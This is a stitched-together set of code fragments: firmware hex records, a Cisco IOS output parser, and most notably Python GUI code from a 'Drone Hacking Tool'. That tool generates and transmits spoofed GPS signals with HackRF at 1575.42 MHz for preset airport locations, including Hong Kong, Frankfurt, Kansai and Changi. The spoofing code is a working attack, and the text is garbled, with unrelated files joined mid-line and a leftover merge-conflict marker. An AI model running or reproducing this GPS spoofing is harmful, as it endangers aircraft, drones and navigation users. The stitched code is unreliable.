0xbe,0x35,0xe1,0x7f,0x3a,0xd2,0x40,0xd8,0x8d,0x3d,0x27,0x52,0x91,0x3b,0x2,0x55],[ # Record 62: Address = 0x2f00, Length = 128 0x2f00,0x80, 0xab,0xd0,0x26,0x8,0xc6,0x81,0xb3,0x5f,0x5d,0xa5,0x8d,0x75,0xd,0x30,0x81,0xe1, 0x63,0xde,0x3d,0x6,0x35,0x85,0x84,0x3d,0xaf,0xf6,0xbc,0x94,0x8f,0xb5,0xd5,0x82, 0x60,0x9a,0x55,0x3c,0x70,0x4f,0xa8,0x49,0xfc,0xd4,0x4a,0xba,0x9,0xc3,0x1b,0xf5, 0x2b,0xbb,0x89,0xb2,0x3e,0xb4,0xa8,0xc3,0x38,0xe0,0x60,0x17,0xe6,0xcf,0x1f,0x1c, 0x9b,0x74,0x9,0xf0,0x1,0xb,0x4e,0x78,0xb2,0x46,0xcc,0x9c,0xb7,0xb0,0x5a,0x1b, 0xb8,0x43,0x1b,0x21,0xa5,0x1b,0x6f,0x5,0x84,0x36,0x7a,0xbb,0x25,0x3,0x38,0xac, 0xe5,0xd4,0x40,0xbb,0xed,0x91,0x17,0x78,0x5d,0x7,0x9e,0x64,0xba,0xdf,0x67,0x5e, 0x69,0x37,0xaa,0x9f,0x9e,0xbc,0x8e,0x76,0xe6,0xa2,0x79,0xe3,0x6c,0xba,0x31,0x20],[ # Record 63: Address = 0x2f80, Length = 128 0x2f80,0x80, 0xf7,0x48,0xdf,0x78,0x78,0x2c,0x3,0xb3,0xdf,0xf0,0x27,0xae,0xf4,0xde,0x18,0xba, 0xae,0x51,0x81,0xdc,0x64,0x1f,0x35,0x5,0x8c,0xef,0x5b,0x97,0x38,0x2d,0x55,0x44, 0x85,0xce,0x4,0xd9,0x16,0x3b,0xc3,0x71,0x9e,0xda,0xa6,0x42,0xfc,0xc5,0x56,0x3b, 0xa3,0xca,0xee,0x52,0x4f,0xc7,0x90,0xca,0x58,0x7c,0x98,0x61,0x34,0x94,0xa1,0xf3, 0x29,0xc5,0x18,0xc5,0xba,0x14,0xb3,0xe3,0x3b,0xb9,0x62,0xb5,0x30,0x3b,0x35,0xba, 0xd2,0x63,0xcc,0x65,0x18,0xf6,0x19,0x6,0xee,0x6,0x15,0x40,0xd,0x90,0xf8,0xb7, 0xcb,0xb6,0x71,0xc7,0x50,0x13,0xf4,0x83,0xfa,0x4e,0x2c,0x8d,0x4e,0x1c,0x98,0xeb, 
0xa9,0x5b,0x5,0xa8,0xa6,0x53,0xa6,0x4d,0x4d,0x9,0xee,0x22,0xc6,0xb7,0x64,0x63],[ # Record 64: Address = 0x3000, Length = 128 0x3000,0x80, 0xf8,0x4a,0x30,0x51,0x1f,0x82,0x8f,0x24,0x77,0xb6,0x0,0x59,0x2,0x7d,0x11,0x2f, 0x10,0xb,0xda,0xb7,0xb3,0xbb,0x5b,0x51,0x0,0xc9,0x43,0x48,0x6a,0x67,0x92,0xb5, 0x3,0x97,0xc1,0x78,0x9e,0xa6,0xf4,0xf1,0x57,0xa9,0x8a,0x5e,0x32,0x2,0x5b,0xc4, 0xe,0xa8,0x63,0x99,0x99,0x7a,0x6c,0x80,0xd1,0x87,0x27,0x5,0x6,0xde,0x26,0x9f, 0x19,0xa1,0x62,0x5b,0x36,0xf1,0x46,0x9c,0x9d,0x54,0x74,0x89,0xf1,0xb4,0x5c,0x2c, 0xe6,0xec,0x8e,0xfa,0x4b,0xff,0xf3,0x91,0xea,0xb1,0x26,0x0,0x2b,0x0,0x1b,0x9b, 0x12,0xe0,0x29,0x56,0xc8,0x0,0x43,0xc8,0x9d,0x75,0x93,0xfb,0xa9,0x9e,0x99,0x71, 0x67,0x60,0x6f,0xef,0xc7,0xfa,0xbf,0x52,0x90,0xd3,0x20,0x19,0xd4,0xaf,0x4,0x35],[ # Record 65: Address = 0x3080, Length = 128 0x3080,0x80, 0xec,0xc4,0x3d,0xa1,0xd9,0x3d,0x2a,0xb0,0xcd,0xca,0x65,0xea,0x6c,0x5b,0xd6,0x38, 0xa0,0x7d,0x7d,0x8,0x88,0xc5,0x33,0xdd,0xa1,0xa,0xae,0xa,0x92,0xe9,0x6d,0xae, 0x61,0xf2,0x2c,0xdf,0xe8,0x55,0xd8,0xae,0x18,0xcd,0x1c,0x42,0x7b,0x37,0xa2,0x4f, 0x5f,0x64,0xd,0xdc,0x8a,0xe8,0xcb,0x34,0x5c,0xb7,0x2,0xc,0xe3,0xb1,0x28,0xb4, 0xb8,0xda,0xd0,0x5e,0x36,0x4a,0xf3,0xe4,0x37,0x12,0xfd,0xe2,0x16,0xeb,0x80,0xe6, 0x45,0xa9,0x3a,0x19,0xb2,0xf9,0xd1,0x44,0x75,0xfe,0x5c,0x73,0x84,0x52,0x43,0xc9, 0xad,0x4e,0xd1,0x4e,0x42,0x61,0x81,0xac,0x3b,0xb5,0xa0,0xf3,0x7c,0x2f,0x72,0x6f, 0x13,0x19,0xd3,0x6f,0xfb,0x9a,0xa,0x32,0x9,0x3e,0x97,0xb6,0xc0,0x9e,0xff,0xce],[ # Record 66: Address = 0x3100, Length = 128 0x3100,0x80, 0xe8,0x62,0x77,0x73,0x37,0xb8,0xc4,0x11,0x4c,0x58,0x93,0xdb,0x94,0xed,0x1a,0x60, 0x44,0xda,0x78,0xe4,0xfe,0x11,0x1d,0xe8,0xf9,0xff,0x1c,0xbe,0xea,0x56,0xb0,0x4f, 0x91,0x40,0x7e,0x5,0x2,0x84,0x1e,0xb5,0x6a,0x9a,0xca,0x8d,0xd4,0x67,0x23,0x71, 0x2b,0x95,0x9e,0x26,0x63,0xcf,0xee,0x7e,0x14,0xb5,0xc,0x7c,0x74,0x90,0x4c,0xc3, 0x2a,0xd4,0xe,0xb9,0x1e,0xbd,0xf3,0xe,0x70,0x99,0xd3,0x3d,0xd6,0x6,0x33,0xf, 0x9,0xcd,0xb8,0xac,0x60,0x4f,0x5,0x71,0xb5,0xde,0xec,0x1f,0x8,0x77,0x37,0xa5, 0x5b,0xb2,0x66,0x74,0xbf,0x0,0x9f,0xaf,0xfe,0xe1,0xfb,0x0,0x26,0x25,0x32,0xa9, 0x18,0xc3,0xa7,0x97,0x3b,0x26,0x56,0x97,0x86,0xe6,0xb0,0x6f,0x63,0x55,0x39,0x8c],[ # Record 67: Address = 0x3180, Length = 128 0x3180,0x80, 0x7c,0xa8,0xb3,0x41,0x88,0xf9,0xd0,0xed,0xbc,0xd9,0xb,0xfe,0x62,0x61,0x71,0x3e, 0xcb,0x1d,0xb8,0xc6,0xdd,0x1f,0xb1,0xde,0xf5,0x27,0xf2,0x8d,0x85,0x6f,0x9f,0xfb, 0xd4,0x36,0xe1,0xfb,0x95,0x90,0xd9,0x11,0x4e,0x48,0x4e,0x1c,0x85,0x27,0x7,0xd7, 0x56,0x3e,0x38,0x28,0x7,0x8c,0x76,0xc7,0xb1,0x6,0x46,0xd5,0xad,0x5f,0x8,0x3c, 0xe0,0x6f,0x1a,0xb6,0xa4,0x2b,0xd1,0xa9,0xe6,0x7f,0xd0,0x27,0xc4,0x61,0xab,0x5d, 0xef,0xf,0x69,0x59,0x5,0x0,0xf,0x15,0xe3,0xde,0xa0,0xa,0xe4,0x1,0x9b,0x69, 0x23,0x47,0x7a,0x7d,0xa3,0xa,0x8c,0x36,0x7d,0x8c,0xd6,0x84,0xdd,0xea,0x5c,0x12, 0xc8,0xbe,0x72,0x38,0xa7,0x90,0x46,0x18,0x58,0x85,0xf6,0xd2,0xbc,0xc8,0x49,0x6a],[ # Record 68: Address = 0x3200, Length = 128 0x3200,0x80, 0x5b,0xa3,0x80,0x91,0x2d,0xfc,0xad,0xf0,0x9e,0x3a,0x2a,0xbf,0x59,0x23,0xab,0xfc, 0xdb,0x2b,0xd5,0xd6,0x7b,0x80,0x3d,0x7,0x23,0xd0,0xf8,0x84,0x2b,0xa2,0xfd,0x5a, 0xe,0x2b,0x9a,0xb,0x91,0xef,0x59,0x51,0x32,0x11,0x3e,0xb,0x94,0x9e,0xd1,0xe, 0xe4,0x43,0x28,0x85,0xa7,0xd0,0xd8,0x14,0x39,0xc5,0xf,0x96,0x8e,0xc4,0x22,0xbb, 0x54,0xe,0x8f,0x7f,0x18,0x8f,0x2e,0xa4,0x53,0xb,0xe6,0x3f,0x33,0xe0,0xeb,0x7d, 0x6b,0x9a,0x3f,0xf,0x5d,0x40,0x1c,0xfe,0xeb,0x81,0xe1,0x4b,0xf,0xe8,0xb0,0xdc, 0x41,0x83,0x17,0x99,0x77,0x3b,0x35,0x1,0x22,0x88,0xfa,0x19,0xcf,0x4c,0x9e,0xed, 
0x82,0x2c,0x4c,0x58,0xa,0xb8,0x9a,0xe,0x47,0x89,0x68,0xda,0xb5,0x5b,0x65,0xd8],[ # Record 69: Address = 0x3280, Length = 128 0x3280,0x80, 0xb3,0xd2,0x17,0xf3,0x15,0x9d,0x36,0xad,0x8c,0xc5,0x2,0x1,0xf3,0x46,0xa0,0x1e, 0xa3,0xc,0x7f,0xef,0x5b,0xa7,0xeb,0xb5,0x7e,0x6b,0x11,0xe1,0x58,0x16,0xf0,0x77, 0xf3,0x7f,0x57,0xb9,0x3c,0x13,0x70,0xe,0xb0,0x73,0x38,0x65,0x36,0x99,0x2a,0x78, 0xa3,0x62,0x2,0xc0,0xd2,0x7f,0xb,0x4a,0xb3,0x5c,0xda,0x15,0x14,0x67,0x42,0x90, 0xa8,0x71,0xb1,0x7d,0xe6,0x4c,0x5c,0xca,0x3e,0xf2,0x26,0xdd,0xda,0xdb,0x65,0x2c, 0xc,0xf4,0xfc,0x47,0x6a,0xd5,0xae,0x73,0x7a,0xe2,0xbe,0xd6,0x48,0xea,0x45,0xf3, 0x32,0x14,0xa1,0xf1,0xe4,0x50,0x74,0x45,0x87,0x40,0x82,0x73,0x87,0x1a,0x9a,0xe8, 0xd1,0x1a,0x2e,0x24,0xf3,0xe1,0xe7,0xf2,0xe4,0x51,0xd0,0x84,0x69,0x6e,0xc0,0xab],[ #
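# Each FW_UPDATE_DATA record above follows the layout visible in its comment header:
# a target address, a length byte (0x80 = 128), then the 128 payload bytes. The helpers
# below are a hedged sketch of how such records could be walked and length-checked before
# being handed to a device; send_record is a hypothetical callback, not part of the dump.
def iter_fw_records(fw_update_data):
    """Yield (address, payload) pairs from records shaped [address, length, byte0, ...]."""
    for record in fw_update_data:
        address, length, payload = record[0], record[1], record[2:]
        if len(payload) != length:
            raise ValueError(
                "record at 0x%04x: expected %d bytes, got %d" % (address, length, len(payload)))
        yield address, bytes(payload)


def flash_firmware(fw_update_data, send_record):
    """Push every record to the device via a caller-supplied send_record(address, payload)."""
    for address, payload in iter_fw_records(fw_update_data):
        send_record(address, payload)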
= "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) else: self.fake_gps_attack_file_missing() elif self.user_selected_location == "Singapore Changi Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin") if self.check_fake_gps_file.is_file(): self.progressbar.start() self.attack_button.config(state = "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) else: self.fake_gps_attack_file_missing() else: self.fake_gps_attack_file_missing() def fake_gps_attack_file_missing(self): show_fake_gps_attack_timestamp = time.strftime("%Y/%m/%d-%H:%M:%S") #Create a timestamp self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [""] channel_log = [""] privacy_log = [""] password_log = [""] manufacturer_log = [""] client_BSSID_log = [""] selected_ap_timestamp_log = [show_fake_gps_attack_timestamp] states_log = ["Error: Fake GPS attack file not found. 
Generating fake GPS file, latitude: " + self.get_user_type_in_latitude + ", longitude: " + self.get_user_type_in_longitude + ", airport: " + self.user_selected_location] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log,"timestamp":selected_ap_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ',', mode = "a", header = False) #Write log data to "drone_attack_log.csv" generate_fake_gps_file = "cd " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim; ./gps-sdr-sim -b 8 -e brdc1040.21n -l " + self.airports_latitude + "," + self.airports_longitude + ",100" #print(generate_fake_gps_file) self.progressbar.start() self.info_label.config(text = "Please wait for about 1 minute, generating fake GPS file.") generate_fake_gps_states = subprocess.Popen(generate_fake_gps_file, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) generate_fake_gps_states.communicate() self.attack_button.config(state = "normal") self.info_label.config(text = "Transmission fake GPS signal.") try: self.attack_button.config(text = "Stop attack", image = self.attack_button_stop_icon, command = lambda: self.stop_attack()) except: #If icon not found self.attack_button.config(text = "Stop attack", command = lambda: self.stop_attack()) self.check_log_file = Path(current_path + "/data/hack_drone_log.csv") if self.check_log_file.is_file(): #Check "hack_drone_log.csv" is really exist target_BSSID_log = [""] channel_log = [""] privacy_log = [""] password_log = [""] manufacturer_log = [""] client_BSSID_log = [""] selected_ap_timestamp_log = [show_fake_gps_attack_timestamp] states_log = ["Transmission fake GPS file, latitude: " + self.get_user_type_in_latitude + ", longitude: " + self.get_user_type_in_longitude + ", airport: " + self.user_selected_location] dataframe = pd.DataFrame({"target_BSSID":target_BSSID_log, "channel":channel_log, "privacy":privacy_log, "password":<PASSWORD>, "manufacturer":manufacturer_log, "client_BSSID":client_BSSID_log,"timestamp":selected_ap_timestamp_log, "states":states_log}) dataframe.to_csv(current_path + "/data/hack_drone_log.csv", index = False, sep = ',', mode = "a", header = False) #Write log data to "drone_attack_log.csv" transmission_fake_gps_states = subprocess.Popen("echo " + sudo_password + " | sudo -S hackrf_transfer -t " + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47 -R", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True) transmission_fake_gps_states.communicate() self.info_label.config(text = "Completed.") self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() try: self.attack_button.config(text = "Start attack", image = self.attack_button_start_icon, command = lambda: threading.Thread(target = self.check_selection).start()) except: #If icon not found self.attack_button.config(text = "Start attack", command = lambda: threading.Thread(target = self.check_selection).start()) def stop_attack(self): #Stop fake GPS signal transmission if self.user_selected_location == "Customize": subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS time.sleep(0.1) self.latitude_inputbox.config(state = "normal") 
self.longitude_inputbox.config(state = "normal") elif self.user_selected_location == "Hong Kong International Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/hong_kong_international_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/hong_kong_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Frankfurt Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/frankfurt_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/frankfurt_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Kansai International Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/kansai_international_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS elif self.user_selected_location == "Singapore Changi Airport": self.check_fake_gps_file = Path(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin") if self.check_fake_gps_file.is_file(): subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/singapore_changi_airport.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS else: subprocess.Popen("ps aux | grep '" + current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 47' | awk '{print $2}' | xargs sudo kill -9", stdout = subprocess.PIPE, shell = True) #Close fake GPS time.sleep(0.1) subprocess.Popen("hackrf_info", stdout = subprocess.PIPE, stderr = subprocess.STDOUT, shell = True, universal_newlines = True).stdout #Just for refresh PortaPack screen self.bace_to_homepage_button.config(state = "normal") self.progressbar.stop() def destroy_rf_attack_gui(self): self.title_label.destroy() self.world_map_display_label.destroy() self.location_select_list.destroy() self.latitude_label.destroy() 
self.latitude_inputbox.destroy() self.latitude_label_latitude_inputbox_frame.destroy() self.longitude_label.destroy() self.longitude_inputbox.destroy() self.longitude_label_longitude_inputbox_frame.destroy() self.progressbar.destroy() self.info_label.destroy() self.bace_to_homepage_button.destroy() self.attack_button.destroy() self.footer_frame.destroy() self.messagebox_tips_state = True self.controller.show_frame("StartPage") if __name__ == "__main__": app = SampleApp() app.title("Drone Hacking Tool") app.geometry("850x800+200+200") app.resizable(False, False) try: #Set windows icon app.iconphoto(True, tk.PhotoImage(file = current_path + "/data/gui_img/drone_main_icon.png")) except: pass print(" P100 CEEFAX 1 100 Mon 13 Jun 19:27/35 ") print(" █████████████████ ████████████ ") print(" ████████ █████ █ █ █ ") print(" ████████ █████ █ ██████████ █ ███████ █████████████████ ") print(" ████████ █████ █ █ █ █ ███████ █ ████ ████████ ") print(" ████████ █ █ █████ █ █ ███████ █ ███ █████████ ") print(" ████████ █████ █ █ █████ █ █ ███████ █ ██ ██████████ ") print(" ████████ █████ █ █ █ █ ███████ █ ███████████ ") print(" ████████ █████ █ █ █████ █ █ ███████ █ ██ ██████████ ") print(" ████████ █████ █ █ █████ █ █ █ █ ███ █████████ ") print(" █████████████████ █ █████ █ ██████████ █ ████ ████████ ") print(" █ █████ █ █ ████ ████████ ") print(" ████████████ ███████████████████ ") print(" Ver: 1.1.2.111 ") print(" ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ░░░░░░░░ ") print(" ░ ░░░ ░ ░░ ░ ░ ░ ░░░░ ░ ░ ░ ") print(" ░ ░░░ ░░ ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░░ ░ ░ ░░░░░░ ") print(" ░ ░░░░ ░ ░ ░░ ░ ░░░░ ░ ░ ░ ░░ ░ ░ ░░ ") print(" ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░░░ ░ ░ ░░ ░ ░ ░ ░░░░░░ ") print(" ░ ░░░ ░░ ░ ░░░░ ░ ░ ░░░░ ░ ░
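# stop_attack above repeats the same shell pipeline (ps aux | grep ... | awk '{print $2}'
# | xargs sudo kill -9) once per airport .bin file. A small helper like the sketch below
# could remove that duplication; the function name and the use of pkill -f are assumptions
# for illustration, not part of the tool itself.
import subprocess

def kill_transmitter(bin_path: str) -> None:
    """Stop any hackrf_transfer process started with the given .bin file (illustrative sketch)."""
    pattern = bin_path + " -f 1575420000 -s 2600000 -a 1 -x 47"
    subprocess.run(["sudo", "pkill", "-9", "-f", pattern], check=False)

# Each branch of stop_attack would then reduce to one call, e.g.
# kill_transmitter(current_path + "/driver/GPS_SDR_SIM/gps-sdr-sim/frankfurt_airport.bin")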
___ ___ _____ ___ _____ ___ __ __ ___ _____ _ _ ___ ___ ___ # | _ \ _ \_ _\ \ / /_\_ _| __| | \/ | __|_ _| || |/ _ \| \/ __| # | _/ /| | \ V / _ \| | | _| | |\/| | _| | | | __ | (_) | |) \__ \ # |_| |_|_\___| \_/_/ \_\_| |___| |_| |_|___| |_| |_||_|\___/|___/|___/ # # ------------------------------------------------------------------------- def __parse_data_files(self, lines, **kwargs): ''' __ios_parse_data_files Args: lines: contains the output of the dir of that specific kwargs: passing keyword ( or named) arguments ''' if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) new_list = [] runfile = re.escape(kwargs['running_ios']) rundir = re.escape(kwargs['running_dir']) reqdir = re.escape(kwargs['required_dir']) f = re.escape(kwargs['filter']) for line in lines: line = line.strip() # Remove leading and trailing spaces # Build conditional to ignore the running IOS binary file, # if exist. cond1 = re.match('^[0-9]+\\s+(-rw).*\\s+(' + runfile + ')$', line) # Build conditional to ignore the directories that contains the # name of the running IOS and required IOS, if exist. cond2 = re.match( '^[0-9]+\\s+(drw).*\\s+(' + rundir + '|' + reqdir + ')$', line) # Build conditional to keep files and directories that contains the # model variant name that is extracted from the required IOS. cond3 = re.match('^[0-9]+\\s+.*\\s+(' + f + ').*$', line) if (not (cond1 or cond2)) and cond3: if self.debug: self.dp.v_debug("Found line: " + line) # End of if self.debug: new_list.append(line.split()[-1]) # End of if (not (cond1 and cond2)) and cond3: # End of for line in lines: if self.debug: self.dp.v_debug("<<< End of " + self.__who_am_i()) return new_list ''' End of def __parse_data_files(lines, **kwargs): ''' def __parse_filefolder(self, lines, source, mtype, from_function): ''' __parse_filefolder Args: data: contains the output from the used Cisco command source: name of file or folder mtype: file/folder to filter on from_function: passing the function name ''' result = None s = re.escape(source) p = re.escape(mtype) for line in lines: line = line.strip() # Remove leading and trailing spaces cond = re.match('^[0-9]+\\s+' + p + '.*' + s + '$', line) if cond: if self.debug: self.dp.v_debug( "(" + from_function + ") Found line: " + line) # End of if self.debug result = line.split()[-1] # End of if cond cond2 = re.match('^(No files in directory)$', line) if cond2: if self.debug: message = "(" + from_function + ") Found line: " + \ "'No files in directory'" self.dp.v_debug(message) # End of if self.debug result = None # End of if cond2: # End of for line in lines: if self.debug: message = "(" + from_function + ") " + str(type(result)) message += " result = " + str(result) self.dp.v_debug(message) # End of if self.debug return result ''' End of def __parse_filefolder(lines, source, mtype, from_function): ''' def __parse_filesystem_space(self, lines): ''' __parse_filesystem_space Args: data: contains the output from the used Cisco command ''' data_dict = {} if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) for line in lines: line = line.strip() # Remove leading and trailing spaces cond1 = re.match( '^[0-9]*\\s(bytes available).*', line) cond2 = re.match( '^[0-9]*\\s(bytes total).*', line) if cond1: if self.debug: message = "(" + self.__who_am_i() + ") Found line: " + line self.dp.v_debug(message) # End of if self.debug: free_kb = round( int( re.sub( '\\s+(bytes available)\\s+.*', '', line)) / 1000) used_kb = round(int( re.sub('.*\\(([0-9]+?)\\s(bytes used)\\)', '\\1', line) ) / 
1000) data_dict['total_kb'] = free_kb + used_kb data_dict['free_kb'] = int(free_kb) # End of if cond1: elif cond2: if self.debug: message = "(" + self.__who_am_i() + ") Found line: " + line self.dp.v_debug(message) # End of if self.debug: total_kb = round( int(re.sub('\\s+(bytes total)\\s+.*', '', line)) / 1000) free_kb = round( int( re.sub( '.*\\(([0-9]+?)\\s(bytes free).*\\)', '\\1', line) ) / 1000) data_dict['total_kb'] = int(total_kb) data_dict['free_kb'] = int(free_kb) # End of elif cond2: # End of for line in lines: if self.debug: self.dp.v_debug("(" + self.__who_am_i() + ") data_dict = ") pprint(data_dict) self.dp.v_debug("<<< End of " + self.__who_am_i()) return data_dict ''' End of def __parse_filesystem_space(self, lines): ''' def __parse_find_file(self, item_object, key, label=None): ''' __parse_find_file Args: item_object: passing object key: passing key name label: passing label to find ''' rvalue = None if self.debug: self.dp.v_debug(">>> Start of " + self.__who_am_i()) if isinstance(item_object[key], dict): if self.debug: message = "(" + self.__who_am_i() + ") The variable item[" + \ key + "] is a dictionary." self.dp.v_debug(message) # End of if self.debug: if label in item_object[key]: rvalue = item_object[key][label] if self.debug: message = "(" + self.__who_am_i() + \ ") The dictionary item[" + key message += "] contains the key '" + label + "'." self.dp.v_debug(message) self.dp.v_debug(("(" + self.__who_am_i() + ") " "" + label + " = " + rvalue)) # End of if self.debug: # End of if label in item_object[key]: # End of if isinstance(item_object[key], dict): elif isinstance(item_object[key], list): if self.debug: message = "(" + self.__who_am_i() + ") The variable item['" + \ key + "'] is a list." self.dp.v_debug(message) # End of if self.debug: rvalue = item_object[key][0].split('\n') elif isinstance(item_object[key], str): if self.debug: message = "(" + self.__who_am_i() + ") The variable item['" + \ key + "'] is a string." self.dp.v_debug(message) # End of if self.debug: rvalue = item_object[key] # End of elif isinstance(item_object[key], str): if self.debug: self.dp.v_debug("<< < End of " + self.__who_am_i()) return rvalue ''' End of def __parse_find_file(item_object, key, label=None)''' # ███╗ ███████╗ ███╗ # ██╔╝ ██╔════╝ ╚██║ # ██║ ███████╗ ██║ # ██║ ╚════██║ ██║ # ███╗ ███████║ ███║ # ╚══╝ ╚══════╝ ╚══╝ def __stdout(self, data, from_method): ''' __stdout Determine if the passed variable 'data' is a list or string. Args: data: command output result from_method: method name ''' raw_list = [] # Initialize an empty list if isinstance(data, str): # The variable 'data' is a string if self.debug: message = "(" + from_method + \ ") The argument 'data' is a string." self.dp.v_debug(message) # End of if self.debug: # Split a string into a list using newline as separator raw_list = data.split("\n") else: message = "(" + from_method + ") The passed argument 'data' is " message += "not a list nor string." 
self.dp.v_error(message) self.error = True # End of if isinstance(data, list): return raw_list ''' End of def __stdout(data, from_method): ''' def __who_am_i(self): return inspect.stack()[1][3] ======= #!/usr/bin/env python import inspect import re from pprint import pprint # require pip install --upgrade pandas import pandas as pd # ██╗ ██╗███████╗██████╗ ██████╗ ██████╗ ███████╗██╗████████╗██╗ ██╗ # ██║ ██║██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔════╝██║╚══██╔══╝╚██╗ ██╔╝ # ██║ ██║█████╗ ██████╔╝██████╔╝██║ ██║███████╗██║ ██║ ╚████╔╝ # ╚██╗ ██╔╝██╔══╝ ██╔══██╗██╔══██╗██║ ██║╚════██║██║ ██║ ╚██╔╝ # ╚████╔╝ ███████╗██║ ██║██████╔╝╚██████╔╝███████║██║ ██║ ██║ # ╚═══╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ class Verbosity: ''' class Verbosity Provide a colorfull output to make it better visible ''' # Private variables __red = '\033[31m' __green = '\033[32m' __orange = '\033[33m' __blue = '\033[34m' __purple = '\033[35m' __cyan = '\033[36m' __lightgrey = '\033[37m' __darkgrey = '\033[90m' __lightred = '\033[91m' __lightgreen = '\033[92m' __yellow = '\033[93m' __lightblue = '\033[94m' __pink = '\033[95m' __lightcyan = '\033[96m' __reset = '\033[0m' def __init__(self, **args): ''' Constructor Is a reserved method in Python classes. This method called when an object is created from the class and it allow the class to 